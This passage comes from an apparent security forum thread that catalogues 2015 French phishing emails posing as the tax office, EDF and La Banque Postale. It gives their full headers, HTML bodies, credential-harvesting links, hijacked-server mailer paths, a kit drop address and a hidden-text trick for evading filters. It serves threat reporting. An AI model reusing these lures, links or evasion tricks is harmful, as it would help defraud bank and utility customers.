font-size:12pt;
font-family:Calibri;
}

--></style></p

Code: Select all

x-store-info:4r51+eLowCe79NzwdU2kR3P+ctWZsO+J
Authentication-Results: hotmail.com; spf=none (sender IP is 222.165.135.195) smtp.mailfrom=www-data@rosa.wpc.gov.lk; dkim=none header.d=impotsgouv.fr; x-hmca=none header.id=contact@impotsgouv.fr
X-SID-PRA: contact@impotsgouv.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02
X-Message-Info: 11chDOWqoTmq2TL8uNVlsaOLoCq9/2qS02Od7nb+qQYK/rZuG3gjAZB5Nzw6BMB8vPkJ+c3kiTo7BlACIfWR0blSKIGqvNOvYtU9JGMDPA/V3QDLYG4kYEu3nuLwSIjL+dl1c7lNT6h3zAtNhoARh+U3Pdv/U5fuKZITNqaTa2ooe4ass9glm3/5pGrjlB/mS7/g9XMpqbZmxfaxyQ/Wa2f4BA2dOBViBHk2nb5rA/UTz6Bko51LRA==
Received: from localhost ([222.165.135.195]) by COL004-MC5F21.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
	 Thu, 27 Aug 2015 13:03:30 -0700
Received: by localhost (Postfix, from userid 33)
	id D0AAA207389; Fri, 28 Aug 2015 01:28:55 +0530 (IST)
Date: Fri, 28 Aug 2015 01:28:55 +0530
To: ********@live.fr
From: "Impots.Gouv.fr" <contact@impotsgouv.fr>
Reply-To: contact@impotsgouv.fr
Subject: Avis de votre reglement !
Message-ID: <8d4e7c845e05a94f95e8828ad3cfe0e0@wpc.gov.lk>
X-Priority: 3
X-Mailer: PHPMailer (phpmailer.sourceforge.net) [version ]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="iso-8859-1"
Return-Path: www-data@rosa.wpc.gov.lk
X-OriginalArrivalTime: 27 Aug 2015 20:03:31.0028 (UTC) FILETIME=[722A7140:01D0E103]

<div class="ecxgmail_extra">
<div class="ecxgmail_quote">
<table height="302" align="center" border="0" cellpadding="0" cellspacing="0" width="623" style="color:rgb(34, 34, 34);font-family:arial, sans-serif;font-size:13px;padding:0px;border:0px none;border-spacing:0px;">
    <tbody style="padding:0px;border:0px;">
        <tr style="padding:0px;border:0px;">
            <td width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"><br />
             </td>
            <td valign="bottom" width="168" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"> </td>
        </tr>
        <tr style="padding:0px;border:0px;">
            <td colspan="2" height="100" width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"><img alt="" src="https://ci3.googleusercontent.com/proxy/S7Ecs1UTkIp5q8QItQKopJ7gqpByYD1qd-FDb8BRPQhiOpbq0jcCROmfh35zRiClxG3EGaRYlXkwBzwZez1YAqmhguSFmzQE4Afk=s0-d-e1-ft#http://sebastien-bruneau.fr/site/pluxml/images/RF.png" height="109" width="191" style="" /></p>
            </td>
        </tr>
        <tr style="padding:0px;border:0px;">
            <td colspan="2" height="25" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;"><br />
            <br />
            <br />
            <table border="0" cellpadding="10" cellspacing="0" width="100%" style="padding:0px;border:0px;border-spacing:0px;color:rgb(68, 68, 68);font-family:'Helvetica Neue', Helvetica, Arial, sans-serif;font-size:12px;">
                <tbody style="padding:0px;border:0px;">
                    <tr style="padding:0px;border:0px;">
                        <td width="45%" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">Cher(e) client(e)<br />
                         </td>
                    </tr>
                    <tr style="padding:0px;border:0px;">
                        <td style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;color:rgb(136, 136, 136);">
                        <p style="padding:0px;line-height:1.3em;width:auto;"> </p>
                        <p style="padding:0px;line-height:1.3em;width:auto;">Après les calculs de vos impots sur le revenu, nous avons déterminé que vous</p>
                        <p style="padding:0px;line-height:1.3em;width:auto;">êtes admissible à recevoir un remboursement d'un montant de 218.75 euros;</p>
                        <p style="padding:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"><span style="color:rgb(105, 105, 105);"><span style="font-size:11px;">Nous vous invitons à consulter les démarches a suivre en </span></span><font color="#5a5a5a" face="helvetica, arial, sans-serif" style="font-size:11px;line-height:14px;"><font color="#1155cc"><a href="http://reouvrement-info-secure-accountimpot.com/Centre.Impot.Gouv.fr/index.html"_blank">cliquant-ici.</a></font></font></p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
                        </td>
                    </tr>
                </tbody>
            </table>
            </td>
        </tr>
    </tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" align="center" style="padding:0px;border-spacing:0px;color:rgb(68, 68, 68);font-family:Arial, Verdana, Helvetica, sans-serif;font-size:12px;width:490px;height:126px;">
    <tbody style="padding:0px;border:0px;">
        <tr style="padding:0px;border:0px;">
            <td width="632" style="font-family:arial, sans-serif;padding:0px;border:0px;vertical-align:top;">
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;">Très cordialement,</p>
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;"> </p>
            <p style="padding:0px;border:0px;line-height:1.3em;font-family:Arial, Verdana, Helvetica, sans-serif;width:auto;">impots.gouv.fr-Direction Générale des finances publiques</p>
            </td>
        </tr>
    </tbody>
</table>
<blockquote class="ecxgmail_quote" style="border-left:1px #ccc solid;padding-left:1ex;"><br />
</blockquote></div>
</div>
</div>
<p><style type="text/css"><!--
.ExternalClass .ecxhmmessage P {
padding:0px;
}

.ExternalClass body.ecxhmmessage {
font-size:12pt;
font-family:Calibri;
}

--></style></p

Code: Select all

http://www.recouvrement-info-accountapplstore.com/info-impot.gouvfrance.fr/redirection.php?g4d3bdOsiuarHDdBl0bEP6dBVy_wP1WJ6XZDh7nemRp9bv2mHJ0HYZaZV6xWExsS

VT: 0/63
VT: 0/63 - UQ - UQ2

• dns: 8 ›› ip: 62.149.128.163 - adress: REOUVREMENT-INFO-SECURE-ACCOUNTIMPOT.COM
• dns: 8 ›› ip: 62.149.128.163 - adress: RECOUVREMENT-INFO-ACCOUNTAPPLSTORE.COM

Some mailers:

Code: Select all

X-PHP-Script: rejuveniceretail.com/wp-admin/includes/saltonindex.php for 185.81.157.89
X-PHP-Script: www.dragonleisure.bt/cache/1.php for 45.217.61.71
X-PHP-Script: movielink.ml/templates/beez3/mailerxd.php for 185.81.158.114
X-PHP-Script: idpstyle.com/admin/web/area/-/b1.php for 185.81.158.114

And finally a mail adress dumped from one hijacked server (email addresses varies from domains, a copy of the kit can be found in attachment)

Code: Select all

$to = "keane010203@gmail.com";

ID PhishTank: { #3426025 | #3426027 | #3426028 | #3426033 | #3426036 | #3426037 | #3428903 }

Attachments

www.impots.gouv.fr.zip

infected
(206.07 KiB) Downloaded 48 times

Registration Problems and FAQ - Rules For Malware Requests

Username

Xylitol

Rank

Global Moderator

Posts

1706

Joined

Sat Apr 10, 2010 5:54 pm

Location

Seireitei, Soul Society

Contact

Re: Phish-BankFraud

#26629 by Xylitol
Mon Aug 31, 2015 8:42 pm

Fresh phishing e-mail campaign targeting 'EDF' and LBP ('La banque Postale' a French bank) mails received with one minute interval.

Électricité de France:

Code: Select all

x-store-info:4r51+eLowCe79NzwdU2kR0zqpsRfiBoycNOl1Rdc4Wed3CG6v4CKRes1BLQziKkwBaiDV1n0fnUS/zPaKTjCreAUN7rjFFIzuQcA5OPTc7UP7vHtSVgYEHAXp4l8d1isGAFHxSjaMwE=
Authentication-Results: hotmail.com; spf=none (sender IP is 203.98.87.50) smtp.mailfrom=service@free.fr; dkim=none header.d=free.fr; x-hmca=none header.id=service@free.fr
X-SID-PRA: service@free.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD0w
X-Message-Info: L86biS6VcGqhXgJjcPpdO+AbBDqiCEFo7hzj6vjHdwYGauGjg7wwkAz+oaYZfsnkJlEyf/vij5lArfxAaJ0/wt0fbyyUcm8y+HkNYqyuiopQODnMRYdPr+z6QVLRoUfuSOguS5dQkvfTWdLbvsHepvc+o4H/86HD8sr+Mckgv724IbBPTVObbL9+AH5Z4E2QFZ0wMIFjY6O0TQMbxoURwnFbhfHAy6FIS78cWM6psrFP5I5H8lBtog==
Received: from post.internet.net.au ([203.98.87.50]) by COL004-MC4F6.hotmail.com with Microsoft SMTPSVC(7.5.7601.23143);
	 Mon, 31 Aug 2015 11:01:00 -0700
Received: from localhost (localhost.localdomain [127.0.0.1])
	by post.internet.net.au (Postfix) with ESMTP id 4A77A1A04851;
	Thu, 27 Aug 2015 14:45:09 +1000 (EST)
X-Virus-Scanned: amavisd-new at post.internet.net.au
Received: from post.internet.net.au ([127.0.0.1])
	by localhost (post.internet.net.au [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id SlLdURo0kuBb; Thu, 27 Aug 2015 14:45:08 +1000 (EST)
Received: from vps193522 (210.ip-149-202-63.eu [149.202.63.210])
	by post.internet.net.au (Postfix) with ESMTPA id DF5791A04FD0;
	Thu, 27 Aug 2015 08:21:40 +1000 (EST)
From: "Votre espace Client EDF" <service@free.fr>
Subject: Non =?ISO-8859-1?Q?R=E9ception?= de paiement
To: phinex-electro@live.fr
Content-Type: text/html;iso-8859-1
Reply-To: service@free.fr
Date: Thu, 27 Aug 2015 00:22:00 +0200
X-Priority: 3
X-Library: Indy 8.0.25
Message-Id: <20150826222149.DF5791A04FD0@post.internet.net.au>
Return-Path: service@free.fr
X-OriginalArrivalTime: 31 Aug 2015 18:01:15.0722 (UTC) FILETIME=[07A292A0:01D0E417]

<h1><a href="https://mobile-reid.com/"><img alt="" src="http://i57.tinypic.com/9a7azc.jpg" /></a></h1>

mobile-reid.com is redirecting to esapces-abonnes.com and use a CloudFlare SSL cert.

• dns: 2 ›› ip: 104.27.146.32 - adress: MOBILE-REID.COM
DNS->IP :: MOBILE-REID.COM {'88.198.188.38'}
• dns: 1 ›› ip: 88.198.188.38 - adress: lite.xisto.com

• dns: 2 ›› ip: 141.101.127.237 - adress: ESAPCES-ABONNES.COM
DNS->IP :: ESAPCES-ABONNES.COM {'103.6.198.208'}
• dns: 1 ›› ip: 103.6.198.208 - adress: msv33-nut.mschosting.com

Worth a read: https://blog.malwarebytes.org/fraud-sca ... hing-scam/
ID PhishTank: { #3430806 | #3430807 }
Just a reminder to report at CloudFlare: https://www.cloudflare.com/abuse/ and eventually if you have questions: @xxdesmus (Trust & Safety at CloudFlare)

La banque postale:

Code: Select all

x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=pass (sender IP is 212.227.126.131) smtp.mailfrom=auth@email.com; dkim=none header.d=email.com; x-hmca=pass header.id=auth@email.com
X-SID-PRA: auth@email.com
X-AUTH-Result: PASS
X-SID-Result: PASS
X-Message-Status: s1:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0xO1NDTD0y
X-Message-Info: NhFq/7gR1vTPM1R1iMPiq4UFLtScayhKeBcje9By0+wMf424NIe5Nfq37WqznclPKzHRqjdnVd4L0JhL37tmGvg16zJYCiwfxpleph5H2/ap209goBPxymXlxYPg5VViTP6qyLUjRlYlTUoZnf5CVQmj4bT8Hfh3dqOB9jMjbcKcJxmu1xtU4thnrQ3IkO6OvLwzVZ8FjdKIQn9ui2SM59fCmEoij8eHrJqPPdgZQZ/GV9IfLCQP7g==
Received: from mout.kundenserver.de ([212.227.126.131]) by BAY004-MC1F58.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.23143);
	 Mon, 31 Aug 2015 11:02:49 -0700
Received: from [10.0.1.5] ([207.195.226.231]) by mrelayeu.kundenserver.de
 (mreue003) with ESMTPA (Nemesis) id 0Lpis6-1Z0xow2hnS-00fSOx for
 <***********@live.fr>; Mon, 31 Aug 2015 20:02:48 +0200
Message-Id: <EQ4QDFXW-PMZS-BZWH-3QH5-JGERADAOGKP@email.com>
Mime-Version: 1.0
From: La banque postale <auth@email.com>
To: "phoenixbytes" <***********@live.fr>
Subject: =?iso-8859-1?Q?Votre_demande_d'adh=E9sion_en_ligne_?=
Date: Mon, 31 Aug 2015 13:02:42 -0500
X-Bounce-Tracking-Info: <cGhvZW5peGJ5dGVzCQkJcGhvZW5peGJ5dGVzQGxpdmUuZnIJVm90cmUgZGVtYW5kZSBkJ2FkaMOpc2lvbiBlbiBsaWduZSAJMjAwCQkxOTk5CWJvdW5jZQlubwlubw==>
Content-type: multipart/alternative; Boundary="--=BOUNDARY_831132_LOBO_QLJV_BWBV_UVIN"
X-Provags-ID:  V03:K0:sPtGn3lyKy0ITvO/vtrEW1BIhF0hxOPUnUnWFIc6mFy4WEt7D0O
 H+DN6/JMdYEabd+6ptgjzf7ZRW1s/P9mfVcWWSiZEjWsTc+7H6gl0kd7nJjY6jveO4n9qFe
 K8IDPwU4UtA3807nns+ODCZHRbKSRCWGj3CH+oknvAPk5sm3pAvRQ1g4mzQJnnEJpeePNuS
 44vH7e5Ky0CmqWc3zOgQA==
X-UI-Out-Filterresults: notjunk:1;V01:K0:QGySSxkyaGo=:ZHpYv4SzjCNiIZRoRwyThl
 7RoaPmYvohWN82JbdTt9amE1rRa5uzbmv5IX9ZD3Vnvb4KMtDfKzjnD1uT/KNVqyFqA+HhMxr
 POEh5ACuoDmq2QdfeCVuz9c6WiE7ySnFdHy9l/nUUjJkPU8i/luyUd8FjL7zPLE6iVRSAST2x
 S6l7A0fXUbg+rWK4bc/EfXcBvo+I2gDIxiDvSU5ckXS+W2hgImiJFERfuqv1v5ZuKqafH/prz
 lK/GxU7U/gz5sag3FOle91DUuSTGZBlbBqOcY/JlEeDEssewIWkEt6tFqAdNSjnch5dV/9wbg
 Ixr29KWPpor5MDvP+nj/FyF+HjlYDRwmLxZjNztrD1a18+9m5g0PciAGnu3KU7CtD1aIBylLB
 LvFL1Cnuy4yToOlG7gk0aIan2NDOU87nD49BoEeiYL3Rrq6H6oYv38gmWbrQBtjoOHunRrcdN
 iQaZSq+wY07XYmHqT/WY1E32zOi2BMUfWJFGWmW9LciN9sn58f4HjjWkf6wqP+jm2rzucxVDd
 /HNb5JuyvHKHpjwpKOJQgn71J9x5svEfckBH9Wdf4WHNVcfpXkCDZQ4G/ZWZyqsuEJMDxYdyZ
 x+gXtLlYWpaC9xVD3REgXoTpJhD/34uwOY/AbOi8RBgK88bHkhbLQnZF6ciHsI5vjv9dW/HS6
 JYUHUDHK3w3J1UkBsHFZQk/lzHfjmv+EmMm5bbgU8YJS1UAOtWPQrSNt4kaPAbVjhduuWEQUG
 ZZCbTbcP3DPtOStgCTjlqWoyUpUBBwkgmg/FcnUzS3IytHDPTVBLMUYbeAq5Tz1zL2WeoKgSn
 7OX9wU6fo1+xdqGieGZ65OA3nVy4pO+wTmmHwuYauq7g0xvVjUdGYbmHcAc75gODiVmjQjQ1J
 /oyCkA0X2Zh9PR9EufYVpUfBhoPSVwMoQ6H+dWGxc=
Return-Path: auth@email.com
X-OriginalArrivalTime: 31 Aug 2015 18:02:50.0453 (UTC) FILETIME=[40196050:01D0E417]
This message is in MIME format. Since your mail reader does not understandthis format, some or all of this message may not be legible.
----=BOUNDARY_831132_LOBO_QLJV_BWBV_UVIN
Content-type: text/plain; charset=iso-8859-1; format=flowed
Content-transfer-encoding: quoted-printable
cher(e) client(e),
 Nous avons d=E9tect=E9 une activit=E9 suspecte sur votre compte la banque
postale et l'avons temporairement verrouill=E9 par pr=E9caution=2E
 Nous fournissons des outils qui contribuent =E0 votre s=E9curit=E9 lorsque=
vous utilisez la banque postale=2E
&nbsp;&nbsp;Prot=E9gez votre compte maintenant
 &nbsp;Merci de la confiance que vous nous t=E9moignez  Cordialement,
objet
Velkommen til Surftown
voir l'en-t=EAte complet fermer l'en-t=EAte
 Return-Path: <cs@surftown=2Ecom>
Received: from mwinf5c26 (mwinf5c26=2Eme-wanadoo=2Enet [10=2E223=2E111=
=2E76]) by
mwinb1g06 with LMTPA; Mon, 22 Jun 2015 17:05:15 +0200
X-Sieve: CMU Sieve 2=2E3
Received: from controlpanel=2Esurftown=2Ecom ([212=2E97=2E130=2E36]) by mwi=
nf5c26
with ME id jT5F1q0030nFlhg01T5FwH; Mon, 22 Jun 2015 17:05:15 +0200
X-bcc: cairequejaime@orange=2Efr
X-ME-bounce-domain: orange=2Efr
X-ME-engine: default
X-me-spamcause: (0)(0000)gggruggvucftvghtrhhoucdtuddrfeekvddrudefgdekgecute=
fuodetggcurfh
rohhfihhlvgemucfogfdpggftiffpkfenuceurghilhhouhhtmecugedtt
denucenucfjughrpefvufffhffkrffoggfgtgeshhektddthedtjeenucfhrhhomhepufhur
hhfthhofihnuceotghssehsuhhrfhhtohifnhdrtghomheqnecuffhomhg
rihhnpehsuhhrfhhtohifnhdrtghomhenucfrrghrrghmpehhvghloheptghonhhtrhholhh
prghnvghlrdhsuhhrfhhtohifnhdrtghomhdpihhnvghtpedvuddvrdelj
edrudeftddrfeeipdhmrghilhhfrhhomheptghssehsuhhrfhhtohifnhdrtghomhdprhgtp
hhtthhopegtrghirhgvqhhuvghjrghimhgvsehorhgrnhhgvgdrfhhr
X-me-spamlevel: not-spam
X-ME-Helo: controlpanel=2Esurftown=2Ecom
X-ME-IP: 212=2E97=2E130=2E36
X-ME-Entity: ofr
Received: by controlpanel=2Esurftown=2Ecom (Postfix, from userid 33) id
E1F2DD4007C; Mon, 22 Jun 2015 17:05:14 +0200 (CEST)
To: cairequejaime@orange=2Efr
Subject: Velkommen til Surftown
X-PHP-Originating-Script: 33:class=2Ephpmailer=2Ephp
Date: Mon, 22 Jun 2015 17:05:14 +0200
From: Surftown <cs@surftown=2Ecom>
Message-ID:
<93599f5caee009d1286e9c7cde0ada5c@controlpanel=2Esurftown=2Ecom>
X-Priority: 3
X-Mailer: PHPMailer 5=2E2=2E2
(http://code=2Egoogle=2Ecom/a/apache-extras=2Eorg/p/phpmailer/)
MIME-Version: 1=2E0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset=3Dutf-8
 Velkommen til Surftown
Hej stret
 Velkommen til Surftown! Vi er glade for, at du har valgt Surftown som
webhotel til din hjemmeside og e-mail=2E
 Indenfor de n=E6ste 5 minutter bliver dit webhotel oprettet, og du vil
modtage en e-mail fra med login-oplysninger til vores kontrolpanel=2E I
kontrolpanelet kan du administrere dit webhotel og dine dom=E6ner=2E Fra
kontrolpanelet kan du ogs=E5 kontakte supporten=2E
 Office 365 Hvis du har bestilt et produkt der indeholder Office 365,
s=E5 vil du modtage en separat email herom indenfor 24 timer=2E Dit Office
365 produkt fornyes =E5rligt sammen med dit webhotel, og kan opsiges
=E5rligt ved fornyelsestidspunktet=2E
 F=F8lg os p=E5 de sociale medier Mens du venter p=E5 at dit webhotel blive=
r
klar, kan du med fordel bruge et par minutter p=E5 at f=F8lge Surftown p=
=E5
Facebook, Twitter og Google+=2E
 Her kan du l=F8bende blive opdateret om nye produkter og tjenester fra
Surftown, samt f=E5 gode r=E5d til hvordan du f=E5r mest muligt ud af dit
webhotel=2E Du vil ogs=E5 kunne holde dig opdateret p=E5 den aktuelle drift=
og deltage i konkurrencer=2E
 Sp=F8rgsm=E5l? Hvis du har sp=F8rgsm=E5l, s=E5 kontakt gerne vores salgsaf=
deling
p=E5 telefon +45 70 70 24 74=2E Salgsafdelingen kan tr=E6ffes alle hverdage=
mellem klokken 9 og 16=2E
 Du er ogs=E5 velkommen til at kontakte os her:
https://controlpanel=2Esurftown=2Ecom/tickets/new/
 Tak for din bestilling=2E
 Venlig hilsen, Surftown
----=BOUNDARY_831132_LOBO_QLJV_BWBV_UVIN
Content-type: text/html; charset=iso-8859-1
Content-transfer-encoding: quoted-printable
<HTML>
<BODY>
<P><IMG border=3D0 hspace=3D0 alt=3D"" align=3Dbaseline src=3D"http://www=
=2Esimamm=2Ecom/postale=2Epng"></P>
<P>cher(e) <STRONG>client(e),</STRONG><BR></P>
<P>
<TABLE style=3D"WIDOWS: 1; TEXT-TRANSFORM: none; TEXT-INDENT: 0px; WIDTH: 5=
80px; BORDER-COLLAPSE: collapse; FONT: 11px/15px LucidaGrande, tahoma, verd=
ana, arial, sans-serif; WHITE-SPACE: normal; LETTER-SPACING: normal; COLOR:=
 rgb(68,68,68); WORD-SPACING: 0px; -webkit-text-stroke-width: 0px" cellSpac=
ing=3D0 cellPadding=3D0>
<TBODY style=3D"LINE-HEIGHT: 15px">
<TR style=3D"LINE-HEIGHT: 15px">
<TD style=3D"PADDING-BOTTOM: 5px; LINE-HEIGHT: 15px; FONT-FAMILY: LucidaGra=
nde, tahoma, verdana, arial, sans-serif; FONT-SIZE: 11px">
<P><B style=3D"LINE-HEIGHT: 15px; FONT-WEIGHT: bold"><FONT style=3D"LINE-HE=
IGHT: normal; FONT-SIZE: 16pt" size=3D4><SPAN style=3D"TEXT-ALIGN: left; WI=
DOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; DISPLAY: inline !important; FONT: 13px/19px helvetica, arial, san=
s-serif; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: r=
gb(20,24,35); WORD-SPACING: 0px; font-stretch: normal"><B style=3D"LINE-HEI=
GHT: 18px; FONT-WEIGHT: bold">N</B>ous avons d=E9tect=E9 une activit=
=E9 suspecte sur votre compte la banque postale et l'avons temporairement v=
errouill=E9 par pr=E9caution=2E</SPAN></FONT></B></P>
<P><B style=3D"LINE-HEIGHT: 15px; FONT-WEIGHT: bold"><FONT style=3D"LINE-HE=
IGHT: normal; FONT-SIZE: 16pt" size=3D4><SPAN style=3D"TEXT-ALIGN: left; WI=
DOWS: 1; TEXT-TRANSFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; DISPLAY: inline !important; FONT: 13px/19px helvetica, arial, san=
s-serif; WHITE-SPACE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: r=
gb(20,24,35); WORD-SPACING: 0px; font-stretch: normal"><STRONG><FONT size=
=3D3>N</FONT></STRONG><SPAN style=3D"TEXT-ALIGN: left; WIDOWS: 1; TEXT-TRAN=
SFORM: none; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; DISPLAY:=
 inline !important; FONT: 14px/20px helvetica, arial, sans-serif; WHITE-SPA=
CE: normal; FLOAT: none; LETTER-SPACING: normal; COLOR: rgb(20,24,35); WORD=
-SPACING: 0px; -webkit-text-stroke-width: 0px">ous fournissons des outils q=
ui contribuent =E0 votre s=E9curit=E9 lorsque vous utilisez la banque posta=
le=2E</SPAN></SPAN></FONT></B></P></TD>
</TR>
</TBODY>
</TABLE></P>
<P>&nbsp;&nbsp;<A href=3D"http://70=2E90=2E126=2E5/boro=2Ehtml">Prot=
=E9gez votre compte maintenant</A></P>
<P>&nbsp;Merci de la confiance que vous nous t=E9moignez <BR>Cordialement,<=
/P><!--  //--><!-- --><!--  //--><!-- -->
<META>
<META><!-- Wrapper stretching to the width of the viewable space -->
<TABLE style=3D"BACKGROUND-COLOR: #ffffff; FONT-FAMILY: Arial, Helvetica, V=
erdana; COLOR: #222222; font-: 12px" class=3DwrapperBG border=3D0 cellSpaci=
ng=3D0 cellPadding=3D0 width=3D"100%">
<TBODY>
<TR>
<TD style=3D"PADDING-BOTTOM: 10px; BACKGROUND-COLOR: #ffffff; PADDING-LEFT:=
 10px; PADDING-RIGHT: 10px; PADDING-TOP: 10px" dir=3Dltr class=3D"module-co=
ntainer mobile-hidden" vAlign=3Dtop align=3Dmiddle>
<TD style=3D"FONT-SIZE: 11px" dir=3Dltr align=3Dleft><FONT color=3D#ffffff>=
</FONT></TD>
<TR class=3Dsubject>
<TH scope=3Drow><FONT color=3D#ffffff>objet </FONT>
</TH>
<TD id=3DtdReadSubject class=3Dlast colSpan=3D2><FONT color=3D#ffffff>Velko=
mmen til Surftown</FONT></TD>
</TR>
</TBODY>
</TABLE>
<TABLE class=3D"mail-table read">
<TBODY>
<TR class=3Dview-header>
<TD class=3D"last header-details" colSpan=3D3>
<P class=3Dheader-details-link-block><A hideFocus class=3D"ib header-detail=
s-link" href=3D"#"><FONT color=3D#ffffff><SPAN class=3Dview-header-link>voi=
r l'en-t=EAte complet </SPAN><SPAN class=3Dhide-header-link>fermer l'en-t=
=EAte </SPAN></FONT></A></P>
<DIV class=3Dheader-content><FONT color=3D#ffffff><STRONG>Return-Path</STRO=
NG>: <cs@surftown=2Ecom><BR><BR><STRONG>Received</STRONG>: from mwinf=
5c26 (mwinf5c26=2Eme-wanadoo=2Enet [10=2E223=2E111=2E76])<BR>by mwinb1g06 w=
ith LMTPA;<BR>Mon, 22 Jun 2015 17:05:15 +0200<BR><BR><STRONG>X-Sieve</STRON=
G>: CMU Sieve 2=2E3<BR><BR><STRONG>Received</STRONG>: from controlpanel=
=2Esurftown=2Ecom ([212=2E97=2E130=2E36])<BR>by mwinf5c26 with ME<BR>id jT5=
F1q0030nFlhg01T5FwH; Mon, 22 Jun 2015 17:05:15 +0200<BR><BR><STRONG>X-bcc</=
STRONG>: cairequejaime@orange=2Efr<BR><BR><STRONG>X-ME-bounce-domain</STRON=
G>: orange=2Efr<BR><BR><STRONG>X-ME-engine</STRONG>: default<BR><BR><STRONG=
>X-me-spamcause</STRONG>: (0)(0000)gggruggvucftvghtrhhoucdtuddrfeekvddrudef=
gdekgecutefuodetggcurfhrohhfihhlvgemucfogfdpggftiffpkfenuceurghilhhouhhtmec=
ugedtt<BR>denucenucfjughrpefvufffhffkrffoggfgtgeshhektddthedtjeenucfhrhhomh=
epufhurhhfthhofihnuceotghssehsuhhrfhhtohifnhdrtghomheqnecuffhomhg<BR>rihhnp=
ehsuhhrfhhtohifnhdrtghomhenucfrrghrrghmpehhvghloheptghonhhtrhholhhprghnvghl=
rdhsuhhrfhhtohifnhdrtghomhdpihhnvghtpedvuddvrdelj<BR>edrudeftddrfeeipdhmrgh=
ilhhfrhhomheptghssehsuhhrfhhtohifnhdrtghomhdprhgtphhtthhopegtrghirhgvqhhuvg=
hjrghimhgvsehorhgrnhhgvgdrfhhr<BR><BR><STRONG>X-me-spamlevel</STRONG>: not-=
spam<BR><BR><STRONG>X-ME-Helo</STRONG>: controlpanel=2Esurftown=2Ecom<BR><B=
R><STRONG>X-ME-IP</STRONG>: 212=2E97=2E130=2E36<BR><BR><STRONG>X-ME-Entity<=
/STRONG>: ofr<BR><BR><STRONG>Received</STRONG>: by controlpanel=2Esurftown=
=2Ecom (Postfix, from userid 33)<BR>id E1F2DD4007C; Mon, 22 Jun 2015 17:05:=
14 +0200 (CEST)<BR><BR><STRONG>To</STRONG>: cairequejaime@orange=2Efr<BR><B=
R><STRONG>Subject</STRONG>: Velkommen til Surftown<BR><BR><STRONG>X-PHP-Ori=
ginating-Script</STRONG>: 33:class=2Ephpmailer=2Ephp<BR><BR><STRONG>Date</S=
TRONG>: Mon, 22 Jun 2015 17:05:14 +0200<BR><BR><STRONG>From</STRONG>: Surft=
own <cs@surftown=2Ecom><BR><BR><STRONG>Message-ID</STRONG>: <93599=
f5caee009d1286e9c7cde0ada5c@controlpanel=2Esurftown=2Ecom><BR><BR><STRON=
G>X-Priority</STRONG>: 3<BR><BR><STRONG>X-Mailer</STRONG>: PHPMailer 5=
=2E2=2E2 (http://code=2Egoogle=2Ecom/a/apache-extras=2Eorg/p/phpmailer/)<BR=
><BR><STRONG>MIME-Version</STRONG>: 1=2E0<BR><BR><STRONG>Content-Transfer-E=
ncoding</STRONG>: 8bit<BR><BR><STRONG>Content-Type</STRONG>: text/html; cha=
rset=3Dutf-8 </FONT></DIV></TD>
</TR>
</TBODY>
</TABLE>
<DIV class=3Dmail-content-readonly>
<TABLE class=3Dmail-content-readonly-table>
<TBODY>
<TR>
<TD>
<DIV id=3Dmessage class=3Dmail-content-read>
<H1 style=3D"LINE-HEIGHT: 24px; FONT-FAMILY: Helvetica,Arial,sans-serif; CO=
LOR: #333333; FONT-SIZE: 24px; FONT-WEIGHT: 300"><FONT color=3D#ffffff>Velk=
ommen til Surftown</FONT></H1>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Hej stret</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
OR: #333333; FONT-SIZE: 14px"><FONT color=3D#ffffff>Velkommen til Surftown!=
 Vi er glade for, at du har valgt Surftown som webhotel til din hjemmeside =
og e-mail=2E</FONT></P>
<P style=3D"LINE-HEIGHT: 20px; FONT-FAMILY: Helvetica,Arial,sans-serif; COL=
